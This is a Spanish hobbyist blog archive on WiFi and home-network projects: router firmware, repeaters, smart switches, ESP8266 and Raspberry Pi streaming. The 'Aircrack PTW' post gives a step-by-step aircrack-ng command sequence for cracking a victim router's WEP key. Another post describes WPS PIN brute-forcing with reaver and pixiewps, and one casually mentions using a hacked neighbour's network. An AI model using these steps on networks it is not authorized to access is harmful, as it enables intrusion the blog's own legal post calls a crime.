Mostrando entradas con la etiqueta WIFI. Mostrar todas las entradas
Mostrando entradas con la etiqueta WIFI. Mostrar todas las entradas

3 de marzo de 2024

Cambio Tarjeta WiFi

 



Hace un tiempo cambie el disco duro, ver aquí, y vi la tarjeta WiFi, cómo la red que tengo es una AX3000, pero el portatil era una AC, comencé a consultar si se podía hacer el cambio, al menos para usar la capacidad de la red WiFi que tengo.

En respuesta a esa pregunta encontre que si y no se podía, para mi caso se puede, con un pero, debía ser alguna que el fabricante tuviera o recomendará para esa misma referencia, porque algunas computadoras pueden tener una lista de su hardware y no permite el cambio de la tarjeta WiFi. 

Asi que encontre una en listado de partes de reemplazo en la página de Lenovo para este portátil, y encontré una "Intel Wi-Fi 6 (Gig+) Desktop Kit, AX200" en Amazon, aunque dice para escritorio es porque trae las antenas, pero no requiero las antenas, lo importante es el conector M.2 con Key A o E, que se refiere a la ranura.


Al realizar el cambio, a una WiFi AX3000, las velocidades llegan a igualar a una conexión cableada, de un 1Gbps, y a aprovechar la maxima conexion de fibra contratada con el provedor de Internet, que es 500Mbps.


Notas y Referencias:


24 de julio de 2022

Repetidor Wifi BasePort Pro Movistar

 

BasePort Pro - Repetidor Movistar

Movistar da un repetidor WiFi en sus instalación de Fibra, este repetidor funciona de la siguiente forma:

  • Modo AP: puede extender la red si se conecta por cable.
  • Modo Repetidor: este modo funciona de la siguiente forma, se conecta mediante la red 5Ghz al router y repite esta señal, la 2.4Ghz funciona en modo estación (AP), el puerto ethernet puede conectar cualquier equipo para acceder a Internet.

Para activar un modo o el otro debe de cambiar el interruptor en la parte inferior que dice Cable Eth (modo AP) o Rep (modo Repetidor), cada vez que se inicie cambia la IP que tiene por defecto ya que cuenta con un cliente DHCP así que toca buscar los equipos conectados para identificar que IP tiene.


Menú y interfaz en modo Repetidor

Con la versión del Firmware que trae no fue posible que el repetidor en WiFi de 5Ghz funcionara, luego de buscar en foros y otras paginas se encontró que la mejor recomendación era actualizarlo.  Esto es bajo su propia responsabilidad y recuerda que Askey no es el único fabricante, puede tener uno del fabricante Mitrastar.

Firmware inicial:

Información de equipo
Nombre del equipo: BP2 Askey XXXX
Modelo: RG3110W
Número de serie: XXXXXXXXXX
Versión Hardware: REV5
Versión Software: RG3110W0.4.23.1
Versión Firmware: GL_g7.10_RG3110W0.4.23.1
Código de país: CO
Estado: Repetidor

Después de la actualización:

Información de equipo
Nombre del equipo: BP2 Askey XXXX
Modelo: RG3110W
Número de serie: XXXXXXXXXX
Versión Hardware: REV5
Versión Software: RG3110W0.6.1
Versión Firmware: GL_g8.1_RG3110W0.6.1
Código de país: CO
Estado: Repetidor

Luego de la actualización el Repetidor a 5Ghz funciona excelente, se aclara que el BasePort Pro se esta usando con otro proveedor de Internet.

Luego de un escaneo de puertos:

BasePort Pro

Ingreso por SSH (puerto 22), el usuario es "admin", el password es la contraseña que tiene el repetidor en la parte inferior.

Contraseña BasePort

Comandos que funcionan hasta el momento, pero no muestran mensajes de ayuda:
  • help
  • ping
  • exit

La consola esta bloqueada para cualquier otro comando u opción.

Actualización - 2022-07-29!!!

Luego de un par de días con el nuevo firmware, al reiniciar el repetidor, este de forma automática descargo he instalo la versión que tenia.

Solo repite el 5Ghz si esta conectado al modem de fibra de movistar, con otro proveedor o router no lo realiza, al tener el firmware original.

Una posible solución es bloquearle al repetidor su salida de internet, es decir, ponerle un ip estática y cambiar la ip del dns y la puerta de salida. hacer esto antes de actualizar.

BasePort - Red


Notas y referencias:


18 de febrero de 2020

Instalación de tp-link Kasa smart HS210



Tp-link tiene una linea inteligente de dispositivos para el hogar para ser usados con el asistente de su elección, sea Alexa de Amazon o Google Assistant.

El HS210 es un interruptor de tres vías o interruptor conmutable, es decir que se tiene dos switches que permiten encender un foco/bombillo. Como se ha mencionado en un post anterior, este modelo también es compatible con sistema eléctrico Colombiano a 110 voltios.

Las herramientas a usar son:

  • Un alicate o corta cables / pelacables
  • Un destornillador
  • Un probador de corriente
  • Cinta Aislante


Como se observa en la siguiente imagen, requiere al menos de cinco (5) conexiones:


Una conexión con interruptor conmutable requiere de al menos dos interruptores, así que solo sera necesario reemplazar uno para convertir el circuito en inteligente. El HS2010 viene en una presentación de Kit de dos interruptores, pero se pueden usar de forma independiente, es decir, usar para dos circuitos.

Esquema para la instalación del kit completo


La instalación del HS210 es indiferente a que punta del circuito se reemplace, sea el conecta el cable de entrada principal (Live o vivo) o el cable se dirige al bombillo (Load o carga).

Lo primero que se debe hacer es identificar cada uno de los cables (usa el probador) de su anterior interruptor y saber cual de los dos va a reemplazar, o si son los dos, se recomienda reemplazar el que este mas próximo a la señal WiFi disponible. Marcar bien los cables, algunas instalaciones en Colombia no cumplen con el color de los cables y puede ocasionar un cortocircuito por confundirlos.

En una conexión tradicional se tiene:
  • Interruptor 1
    • Cable de entrada Live o Vivo
    • Dos cables que conectan los dos interruptores. (travelers - viajeros)
  • Interruptor 2
    • Dos cables que conectan los dos interruptores. (travelers - viajeros)
    • Cable de salida Load - Carga (el que se dirige al bombillo).
Cables adicionales:  se requiere el neutral,  y el de tierra el cual es opcional.

Primero observa que cables le faltan, normalmente seria el cable neutro (color - blanco) y el de tierra (color - verde),  el cable blanco se puede encontrar en la conexión donde esta el bombillo y el verde en algunos casos desde la caja de distribución. Después de instalar los cables se puede conectar el nuevo interruptor inteligente, se deben conectar en donde se indica. Emparejalo con el aplicativo (puedes omitir el paso de la conexión) y al final quedara una luz "piloto" encendida.


En caso de usar Google Asistant, ponerle un nombre adecuado, con el fin de que pueda ser identificado de forma correcta.

Notas y referencias:






8 de octubre de 2018

Implicaciones Legales de una Intrusión WiFi





Bajo la Ley 1273 de 2009, una intrusión a la red WiFi ajena puede estar cometiendo los siguientes delitos en Colombia:

Artículo 269A: Acceso abusivo a un sistema informático. «El que, sin autorización o por fuera de lo acordado, acceda en todo o en parte a un sistema informático protegido o no con una medida de seguridad»…

De acuerdo con el tipo de ataque se puede estar cometiendo:

Artículo 269B: Obstaculización ilegítima de sistema informático o red de telecomunicación.
«El que, sin estar facultado para ello, impida u obstaculice el funcionamiento o el acceso normal a un sistema informático, a los datos informáticos allí contenidos, o a una red de telecomunicaciones»…

La interceptación también es un delito, el dicho que dice “es que la señal ingresa a mi casa”:

Artículo 269C: Interceptación de datos informáticos. «El que, sin orden judicial previa intercepte datos informáticos en su origen, destino o en el interior de un sistema informático, o las emisiones electromagnéticas provenientes de un sistema informático que los transporte»…

Si solo es robo de la señal WiFi para obtener internet serian esos delitos mencionados, pero si la victima es un banco o una entidad del estado se le suma el siguiente articulo:

Artículo 269H: Circunstancias de agravación punitiva: «Las penas imponibles de acuerdo con los artículos descritos en este título, se aumentarán de la mitad a las tres cuartas partes si la conducta se cometiere:»

«1. Sobre redes o sistemas informáticos o de comunicaciones estatales u oficiales o del sector financiero, nacionales o extranjeros.»

La ley colombiana tiene leyes que permiten castigar a un delincuente informático, con solo intentar obtener la clave de la red WiFi del vecino sin su autorización.

Si el delincuente que se introduce furtivamente en la red WiFi del “vecino” con otros intereses a obtener internet gratis, puede aplicar otros delitos.


Notas y Referencias:

1 de diciembre de 2016

ESP8266

El ESP8266 es un chip WiFi de bajo consumo y pequeño, desarrollado por una empresa china  Espressif, este chip permite desarrollar IOT (Internet of Things). Así, que se puede conectar con cualquier  sensor (compatible con Arduino a Internet vía WiFi.


El ESP8266 se puede usar directamente por medio una interface Serial usando comandos AT, o mas avanzado, usando el ambiente de programación Arduino para re-programarlo.

Existen varios modelos de este chip, el primero denominado ESP-01, fue el inicial.



Hay otros modelos básicos que incorporan mas GPIO que el inicial, como el ESP-12F




Hay otras versiones que ya están diseñadas para conectarlas (micro usb) y programarlas de inmediato, y cuando no se usa una de esas prototyping boards hay que hacer una adecuación mínima para comenzar a trabajar sobre el ESP8266.

Modelos (prototyping boards):

  • Adafruit HUZZAH ESP8266 (ESP-12)
  • NodeMCU
  • WeMos D1
  • SparkFun ESP8266 Thing

Para trabajar con el ambiente Arduino se necesita lo siguiente:


Diagrama básico (mínimo) de trabajo (ESP-12):


Como subir el programa, se debe poner el esp8266 en modo FLASH, y se realiza de la siguiente forma: Poner  GPIO_0 a GND, al mismo tiempo RESET a GND (poner y retirar, o poner un pulsador) y luego retirar el GPIO_0 de GND, y de esta forma el esp8266 entra en modo flash, es decir, pulsar FLASH mantenerlo pulsado mientras se pulsa RESET y soltar ambos.

ESP-12F en Protoboard

Documentación y ejemplos visitar: https://github.com/esp8266/Arduino


Notas y referencias:

23 de mayo de 2015

Brute forcing Wi-Fi Protected Setup


Como crackear WPA/WPA2?

En el momento solo existe una forma: ataque por diccionario y/o por fuerza bruta, cual es la diferencia entre las dos, la primera es que se tiene miles de claves generadas en archivo y la segunda que se generan claves y se van probando.

Ver: How to Crack WPA/WPA2

La alternativa es usar Brute forcing Wi-Fi Protected Setup.


Brute forcing Wi-Fi Protected Setup

Existe una forma de obtener la contraseña del WIFI, pero depende de la configuración del AP/Router a atacar, hace un par de años, a finales del 2011, encontraron que WPS (Wifi Protected Setup) que es una forma de ingresar (autenticarse a una red wifi) mediante un PIN es vulnerable la red wifi, resulta que cuando se ingresa un PIN el router/ap responde si es valido o no, así que permite atacarlo mediante fuerza bruta, con un rango finito de números.

Para saber mas sobre la parte técnica de este ataque ver: Brute Forcing Wi-Fi Rrotected Setup

Existe una herramienta llamada "reaver" que se aprovecha de esta vulnerabilidad para recuperar los datos de conexión, es decir obtener la clave WIFI. (Ver Reaver). El tiempo en que se demora el ataque depende de la protección que posea el AP/Router de la victima, puede estar entre 4 horas hasta 3 meses.

Pero en el 2015 salio una nueva versión que optimiza (Pixiewps - pixie dust attack) este tipo de ataque a un mínimo de 12 segundos.


Como detectar la vulnerabilidad de los routers:



Como utilizar el comando "reaver" con "pixiewps":


Despues de un par de segundos:


Como protegerse de este ataque, desactive WPS, se que es fácil ingresar un dispositivo mediante este método, pero es mas seguro para su red, aunque algunos AP/Routers ya traen medidas contra este ataque, pero lo único que hace es retrasarlo.


Notas y referencias:

10 de octubre de 2014

Streaming Video con Java en Raspberry Pi

Streaming de Video con Java en Raspberry Pi


Hay dos modos de crear streming, uno es capturando las fotos (jpeg) que se toman con raspistill, el otro modo es capturando el vídeo (h264) generado con raspivid, como se observa en el tutorial de:   Streaming Video desde el Raspberry Pi, ahora se va generar este streaming con Java.

Como funciona?

Proyectos necesarios vía GitHub:


git clone https://github.com/andrexweb/raspberry-pi.git
Proyecto Maven: StreamingPi
git clone https://github.com/andrexweb/java.git
Proyecto Maven: H264J


El server, es un servidor de paquetes UDP (Datagrama) que esta en el proyecto StreamingPi, el cual solo recibe el flujo de datos, dependiendo de la opción que se incluya jpeg o h264 se activa el reproductor correspondiente, para el caso de h264, es un codec escrito en java que es un "port" de la libreria ffmpeg-libavcodec (pero solo la parte de h264). El proyecto original esta en Google Code h264j, pero copie el proyecto y agregue unas mínimas modificaciones para que reciba el streaming de forma directa, proyecto H264J.

Proyecto disponible en:
GitHub: https://github.com/andrexweb/java
Original: https://code.google.com/p/h264j/


En el momento el reproductor de fotos/vídeo (jpeg/h264) es básico, solo muestra imágenes, próximamente mas opciones.

Para el lado del cliente, es UDP, solo envía lo que genera los aplicativos raspistill y raspisvid, no se usa el modo normal de "pipe" (|), el api de Java cuenta con con una clase que permite la ejecución de comandos y obtener el "stdout" vía inputStreaming.

Ejemplo:


//command: lista de parametros, primero parametro es el comando a ejecutar.
ProcessBuilder  processBuilder = new ProcessBuilder(command);
//Se incia el proceso y se obtiene el inpuStream de la ejecucion, esto es lo que se envía por UDP.
Process process = processBuilder.start();
InputStream  inputStream = process.getInputStream();

Ver Clase para ver implementación completa: 
org.avpsoft.streaming.net.DatagramCommandClient.java

Uso



Opción con raspistill


Primero ejecutamos el servidor (en windows), quien recibe el streaming:

D:\GitHub\raspberry-pi\StreaminPi>java -cp ./target/StreamingPi-1.0-SNAPSHOT.jar org.avpsoft.streaming.main.Streaming 4445 jpeg

Esto nos abre una ventana, donde se mostrara las imágenes.

Ahora ejecutamos el servidor (Raspberry Pi):

pi@raspberrypi ~ $ java -cp ./StreamingPi-1.0-SNAPSHOT.jar org.avpsoft.streaming.main.Streaming 192.168.1.2 4445 raspistill -n -t 0 -tl 150 -th 0:0:0 -w 640 -h 480 -q 5 -o -

Las primeras dos opciones es la ip del servidor y el puerto son fijas, no puede cambiar el orden.




Ejemplo del "lag" (retraso generado) al usar este metodo, 4 segundos, el mejor tiempo que pude registrar estuvo en 3 segundos.


Opción con raspivid

Se requiere este jar adicional H264J-1.0-SNAPSHOT.jar, para el codec h264.
Primero ejecutamos el servidor (en windows), quien recibe el streaming:

D:\GitHub\raspberry-pi\StreaminPi>java -cp ./*.jar org.avpsoft.streaming.main.Streaming 4445 h264

Esto nos abre una ventana, donde se mostrara las imágenes.

Ahora ejecutamos el servidor (Raspberry Pi):

pi@raspberrypi ~ $ java -cp ./StreamingPi-1.0-SNAPSHOT.jar org.avpsoft.streaming.main.Streaming 192.168.1.2 4445  raspivid -n -t 0 -w 640 -h 480 -fps 10 -o -

Las primeras dos opciones es la ip del servidor y el puerto son fijas, no puede cambiar el orden.






Ejemplo del "lag" (retraso generado) al usar este método, es de menos de 1 segundo, mas o menos 300 milisegundos.

Problemas:

* Debido a que se usa UDP y no TCP, es posible que las imágenes se distorsionen, pero es causado por la fiabilidad de la red, si tiene mala señal WIFI eso pasara.
* Cuando se ejecuta el server con h264, es posible que salga errores, pero el streaming sigue funcionando.
* Para terminan la ejecución use Ctrl+C



2 de septiembre de 2014

Raspberry PI


Raspberry PI es un pequeño ordenador del tamaño de una tarjeta de crédito (Placa de computadora SBC), existen varios modelos (A, B, B+ y The Compute Module) lo único que necesita para funcionar es:
  • Fuente de poder (un cargador de celular 5V,  minimo 650mA, para el modelo B+, pero se recomienda 5V, 2A, para dar capacidad al conectar dispositivos USB).
  • Un Teclado USB
  • Un monitor o TV
  • Una memoria microSD con el sistema operativo (Raspbian, recomendado).

Su objetivo es la enseñanza de la computación en escuelas, pero mas allá de ese objetivo es la capacidad de ser usado en proyectos electrónicos y en el IoT (Internet of Things).




Fecha Inicial de Lanzamiento: Febrero 29 de 2012, Lugar Reino Unido. Ultimo modelo B+.

Especificaciones Model B+:
  • CPU: ARM a 700 MHz, Broadcom BCM2835 (armv6k)
  • GPU: Broadcom VideoCore IV
  • RAM: 512 Mb
  • Video: 3.5mm jack, HDMI
  • Perifericos: GPIO, SPI, I2C, UART
  • Puertos: 4 USB, Ethernet 10/100, 1 MicroUSB para alimentación, MicroSD
  • Conector para cámara(CSI-2) y display(DSI).
  • Audio: Audio/Video

Sistemas Operativos:
  • RASPBIAN
  • PIDORA
  • OPENELEC
  • RASPBMC
  • RISC OS (no es linux)
  • ARCH LINUX

Dispositivos soportados:
  • Raspberry PI Camera Module (5Megapixeles).
  • WIFI USB Adapter Nano, Edimax EW-7811Un (Recomendado, las ultimas versiones del SO trae el driver incorporado).

Lenguajes de programación:
  • Python
  • C/C++
  • Java (Embedded, JME)
  • Javascript (node.js)
Ideas y proyectos:

Fuentes:



5 de febrero de 2013

ControlRemoto SBITV 20130205



 Bravia - Media Remote - Nokia


Cambios:

  • Compatibilidad con Device Profile MIDP-2.0  (j2me midp 2.0).

Se realizaron las pruebas con Nokia C6-00, y funciona sin problemas.


Descarga:  ControlRemoto SBITV

20 de agosto de 2012

Repeater Bridge WRT160NL



El modo Repeater Bridge en este router no esta, pero se puede realizar con otra configuracion que es similar.

Son dos pasos basicos:
  • Conectarse a la red en modo Cliente.
  • Crear Interface Virtual. 

Para realizar esta configuracion se recomienda estar conectado vis fisica (por cable de red).

  • Primero se debe tener un router en funcionamiento, y pues con una conexion a internet.
  • En nuestro wrt160nl con la version de dd-wrt   DD-WRT v24-sp2 (08/07/10) std - build 14896.
  • Segundo cambiar configuracion de el wrt160nl, a modo cliente poniendo el SSID del router al cual nos vamos a conectar, tambien se debe configurar la seguridad de la red en el caso de que el router al que se va conectar tenga seguridad.
  • Luego se crea el la interface virtual para crear un red wifi.
  • Las demas configuraciones del router se dejan por defecto.
  • Como este neva red wifi creada con el ap virtual requiere seguridad entonces la configuramos.

A continuacion imagen de la pantalla de configuracion:


Esta es la solucion al modo Repeater Bridge de este router.

Pero en esta configuracion se debe tner en cuenta que si el router no encuentra el ap al que se va conectar la interface virtual no va a funcionar.

Referencia:

http://www.dd-wrt.com/wiki/index.php/Wireless_Bridge
http://www.dd-wrt.com/wiki/index.php/Repeater_Bridge


7 de junio de 2012

WRT160NL USB Storage


Al router le he adicionado una memoria USB de 2Gb, para almacenar e instalarle futuras apliaciones.

La memoria usb le cree 4 particiones de la siguiente forma:

  1. Particion uno de 128Mb para montar /opt/
  2. Particion dos de 128Mb para usarla como swap
  3. Particion tres de 1616Mb para montar /mnt/
  4. Particion cuadtro de 128Mb para montar /jffs/

Las particiones se crearon usando una distro linux,  para datos ext3, y swap.

La primer es habilitar el uso del usb y la memoria para esto vamos a "Services >> USB" y habilitamos el soporte USB y conectar la memoria.



Para compartir archivos de forma sencilla usaremos el servidor FTP que trae el firmware, para habilitarlo hacemos lo siguiente: vamos a "Services >> NAS " y habilitamos el servicio "proFTPD", para ingresar un usuario para tener acceso ingresamos en el area texto "User Password List", asi "usuario clave" donde ponemos en cada linea el usuario y la clave (se puede poner la clave en formato md5).



 Ahora que tenemos todo configurado podemos aplicar los cambios, pero falta algo como hacer que se monte las memoria y las particiones para usarlas? ... R:// de la siguiente forma, mediante un script al arranque del router.

Vamos a "Administration >> Commands" y agregamos el siguiente texto:

mount /dev/scsi/host0/bus0/target0/lun0/part3 /mnt/
sleep 4
sh /mnt/etc/config/begin-here.startup
 
Damos en el boton que dice: "Save Startup" y quedo guardado el scrip que monta una de las particiones, para montar las otras creamos un script que se llama "begin-here.startup" y los guardamos en "/mnt/etc/config/" pero primero creamos lo carpeta (en este punto podemos usar ya el servicio ftp entonces si la ip es 192.168.1.1 ingresamos ftp://192.168.1.1/  y podemos loguearnos con los datos anteriormente ingresados.






En el archivo que se crea ingresamos el siguiente texto:


#!/bin/sh

mount /dev/scsi/host0/bus0/target0/lun0/part1 /opt/
sleep 2
mount /dev/scsi/host0/bus0/target0/lun0/part4 /jffs/
sleep 2




Luego de tener esto ya nuestras particiones se montan de forma automatica, un ultimo paso es habilitar la particion JSSF, asi que se va ha "Administration >> Management" y buscamos "JSFF2 Support" lo habiltamos y listo.






Pasos extras para configurar windows y nos quede en el como una Ubicacion de Red, vamos al explorador de Windows (caso win7) y damos click-derecho y selecionamos Ubicacion de Red.

Ahora se nos despliega una ventana y damos "Siguiente" despues otravez "siguiente y llenamos el campo con la direccion que ya tenemos "ftp://192.168.1.1/".





Damos "Siguiente" y le quitamos la opcion que dice "Inciar sesion de forma anonima" he ingresamos nuestro usuario.


Ahora damos "Siguiente" y lugo "Finalizar" ahora en el explroador de windows tenemos nuestra carpeta.


Nota: cuando nos pida la contraseña podemos dar recordar para que haceda de forma automatica.

Fuente:
DD-WRT USB Storage

4 de junio de 2012

Linksys WRT160NL Bricked, Recuperacion por TFTP

Hace pocos dias compre el router WRT160NL, le instale el DD-WRT, todo salio bien sin problemas, hasta que instale una version BrainSlayer (others>eko>BrainSlayer-V24-preSP2>2012-03-19-12-r18777>linksys_wrt160nl ) y el router dejo de reponder, el indicador luminoso de encendido titilaba sin parar, la señal de link del cable de red funcionaba. Hasta este momento solo tenia un pisapales.

Asi que comenze a leer y encontre aun solucion que fue:
  • Usar el metodo de 30/30/30 reset.
  • Recuperar con TFTP.
Metodo 30/30/30 consiste en:
  1. Desconectar todos los cables de red (UTP), sin desconectar el cable electrico.
  2. Presionar el boton de reset por 30 segundos.
  3. Sin dejar de presionar el boton de reset, desconecte el cable electrico.
  4. Siga presinando por otros 30 segundos.
  5. Reconecte el cable electrico.
  6. Sin soltar el boton reset, siga presinando por otros 30 segundos.
  7. Suelte el boton de reset por 10 segundos.
  8. Desconecte el cable electrico por 10 segundos.
  9. Ahora el router tendra la configuracion por defecto.
Pero si este metodo no tiene efecto entonces segui con el siguiente:

Recuperar con TFTP desde Windows:


Antes de usar verificamos si el router da ping:
  • ping 192.168.1.1 -t -w 5
Si no da ping entonces verificamos que el router tenga una ip:
  • arp -a
Si en la pantalla sale la IP del router y su MAC, entonces aun hay posibilidades de recuperar el pisapapeles.

Como Windows 7 no tiene una herramienta tftp, entonces se uso Windows GUI TFTP Utility , con esta herramienta se configura de la siguiente forma:
  • Server/IP address: 192.168.1.1
  • Password: se deja en blanco.
  • Seleccionar el firmware funcional.
  • Numero de Intentos: 99
Ahora al usar este metodo solo se tiene un par de segundos para intentarlo (Una ventana de 2 segundos, cada vez que se inicia el router).

Se realizo el siguiente procedimiento:
  1. Se ejecuto la herramienta TFTP.
  2. Desconecte el cable de energia del router no mas de 3 segundos.
  3. Volvi a conectar.
  4. Si todo salio bien tenemos, un mensaje de exito por la herramienta tftp.
  5. Ahora tenemos el router recuperado.
Y con esto pude recuperar el router, y al final no se combierto en pisapapeles.

Enlaces externos:

3 de junio de 2012

Linksys WRT160NL


Este es un router que tiene como base un firmware basado en linux, al cual se le pueden poner otro sistema (openWRT, DD-WRT, etc..).

Este router se puede decir que el sucesor del WRT54GL, el router trae unas antenas desmontables pero muy pequeñas.


Pero se pueden cambiar por otras mas grandes, hay que tener en cuenta que el espacio para poner unas nuevas antenas es muy pequeño asi que hay ponerlas con un extensor.



Una de las caractersticas de este router es tiene un puerto USB, en el cual podemos conectarle, varios dispositivos (memorias usb, discos usb, impresoras, hub usb...)

 Enlaces externos:

DD-WRT Linksys WRT160NL

30 de mayo de 2012

WRT54GL


Los que ya los conocen es un buen router, con buen alcance y que se le pueden cambiar las antenas por unas mejores.

La configuracion principal que tiene en el momento es modo: Repeater, que permite este modo, conectarse a otra red (la del vecino, pero despues de haberla hackeado) y poder crear una Red Virtual para su (mi) propio uso. Ambas conexiones permiten tener seguridad independiente, poder tener su propio rango de IP, ya que la conexion WAN se hace por WIFI.

Aqui una fotico con las antenas nuevas (8dbi) que tiene:


Nota: Para lograr la configuracion descrita se necesita tener el Firmware DD-WRT v24 preSP2.

La versatilidad de este router esta en que se puede sustituir el firmware original por uno de terceros, ademas el firmware original esta basado en Linux.  

http://es.wikipedia.org/wiki/WRT54G
http://www.dd-wrt.com/site/index

16 de enero de 2012

Bravia - Media Remote - Nokia

Como habia dicho en la entrada anterior, he desarrollado un aplicado basado en el orginal que esta disponible para Android., Solo tiene las funcionalidades basicas para un TV Sony Bravia Internet TV.

Tiene dos pantallas basicas:

Pantalla de Inicio
Pantalla principal de Inicio.

La segunda pantalla tiene varias pestañas:

Control Basico
Control Multimedia
Control TV
Entrada de Texto

El aplicativo es completamente funcional y esta en estado beta.

Se puede descargar desde:  ControlRemoto-SBITV


Modo de uso:

Cuando se inicie el aplicativo Se escoge "Buscar Dispositivo", luego de un mensaje de alerta, se selcciona la opcion "Conectar" y por ultimo se carga el panel con las cuatro pestañas. Y ya puedes controlar con tu Nokia el televisor Bravia.



Cualquier problema o inquitud, por este blog.



Nota: Cuando se busca el dispositivo, la conexion WIFI debe de estar activa y controlar que no se conecte a la red de datos, si lo hace desconectar el plan de datos.






3 de enero de 2012

Bravia - Media Remote

Media Remote es una aplicacion para Android o iPhone, que permite controlar dispositivos Sony via conexion de red (WI-FI).

Como dice la pagina de Sony:
. Se require que el BRAVIA® HDTV y el dispositivo de control estén conectados a la misma red local con el dispositivo de control remote conectado a un Access Point 802.11 (802.11n recomendado).

El aplicativo solo es para dispositivos con Android o para iPhone, asi que deja por fuera los dispositivos con Symbian S60.


En los siguientes entradas se se presentara una pequeña aplicacion construida en J2ME que realiza una tarea similar al aplicativo original, pero con un enfoque a dispositivos Symbian S60 5th Edition (Nokia C6-00).










1 de enero de 2011

Aircrack PTW

Aircrack-ng es un programa crackeador de claves 802.11 WEP y WPA/WPA2-PSK. Aircrack-ng puede recuperar la clave WEP una vez que se han capturado suficientes paquetes encriptados con airodump-ng.


Encontrar la clave WEP de una red WIFI por este método requiere que paquetes "arp request/reply", y solo trabaja con encriptacion de 128 y 64 bits. 


Cuando se usa aircrack v1.x es el ataque por defecto, para utilizar el anterior metodo se debe poner la opcion -k, para versiones anteriores de aircrack que soportan PTW se debe usar la opcion -z.


He utilizado este metodo que resulto ser muy efectivo con la version 0.9.1 en Windows, encontro la clave en menos de 1s'. 



Metodología usada:



  1. Poner la tarjeta en modo monitor: airmon-ng start rausb0
  2. Capturar los paquetes: airodump-ng -c [channel] -w [network] --bssid [bssid AP] rausb0
  3. Asociarse con el router victima: aireplay-ng -1 0 -a [BSSID AP] -h [MAC mia] -e [ESSID] rausb0
  4. Envio de ARP: aireplay-ng -3 -b [BSSID AP] -h [MAC mia] rausb0
    • En caso de que no se consigan: aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [MAC AP] -h [MAC mia] rausb0     --> Use this packet? y
    • Otra opción es intentar conectarse con otra tarjeta o lapto a esta red para forzar paquetes arp.
  5. Después de generar suficientes paquetes ejecutar Aircrack-ng -a 1 -z archivo.cap
Ejecutar cada ítem anterior en consolas independientes.

Mas documentación: